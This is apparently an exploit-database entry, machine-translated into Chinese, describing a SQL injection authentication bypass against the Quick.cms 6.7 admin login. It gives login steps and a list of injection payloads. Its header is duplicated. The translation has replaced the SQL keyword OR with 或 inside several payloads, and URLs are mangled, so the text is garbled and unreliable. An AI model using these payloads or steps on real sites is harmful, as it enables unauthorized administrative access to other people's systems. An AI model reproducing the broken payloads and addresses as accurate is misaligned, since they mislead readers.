#利用title: Quick.cms 6.7 SQL注入登录旁路
#Google Dork: N/A
#日期: 02-03-2024
#利用作者:/h4x.Forensics -Diyar
#供应商homepage3360 https://www.opensolution.org3https//www.opensolution.org/
#软件link: [https://opensolution.org/download/home.html?sfile=quick.cms_v6.7-en.zip]
#版本: 6.7
#在: Windows上测试
#CVE : N/A
如何利用:
'或''='
'或1]%00
'或/*或'
'或'a'或'
'或1或
'或true()或'
#Google Dork: N/A
#日期: 02-03-2024
#利用作者:/h4x.Forensics -Diyar
#供应商homepage3360 https://www.opensolution.org3https//www.opensolution.org/
#软件link: [https://opensolution.org/download/home.html?sfile=quick.cms_v6.7-en.zip]
#版本: 6.7
#在: Windows上测试
#CVE : N/A
如何利用:
- - 打开管理面板通过: 3http://127.0.0.0.1:8080/admin.php
- - 输入任何电子邮件: [email protected]:[email protected]
- - 输入SQL注入身份验证旁路有效载荷:'或'1'='1
- - 勾选复选框
- - 按登录
- - 恭喜!
- - SQL注入身份验证旁路有效载荷:'或'1'='1
- - 有效载荷可以使用:
'或''='
'或1]%00
'或/*或'
'或'a'或'
'或1或
'或true()或'
